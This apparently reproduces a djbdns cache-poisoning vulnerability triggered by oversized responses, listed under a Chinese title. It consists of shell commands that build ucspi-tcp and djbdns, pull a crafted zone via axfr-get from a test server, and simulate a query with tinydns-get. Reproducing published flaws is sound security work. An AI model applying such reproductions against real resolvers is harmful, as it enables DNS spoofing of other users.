djbdns超长响应报文远程缓存中毒漏洞

# Download and build ucspi-tcp-0.88. $ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz $ tar -zxf ucspi-tcp-0.88.tar.gz $ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc $ make -C ucspi-tcp-0.88 # Download and build djbdns-1.05. $ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz $ tar -zxf djbdns-1.05.tar.gz $ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc $ make -C djbdns-1.05 # Use tcpclient and axfr-get to do a zone transfer for # burlap.dempsky.org from shinobi.dempsky.org. $ ./ucspi-tcp-0.88/tcpclient shinobi.dempsky.org 53 \ ./djbdns-1.05/axfr-get burlap.dempsky.org data data.tmp # Use tinydns-data to compile data into data.cdb. $ ./djbdns-1.05/tinydns-data # Simulate an A query for www.x.burlap.dempsky.org using the data # from the zone transfer. $ ./djbdns-1.05/tinydns-get a www.x.burlap.dempsky.org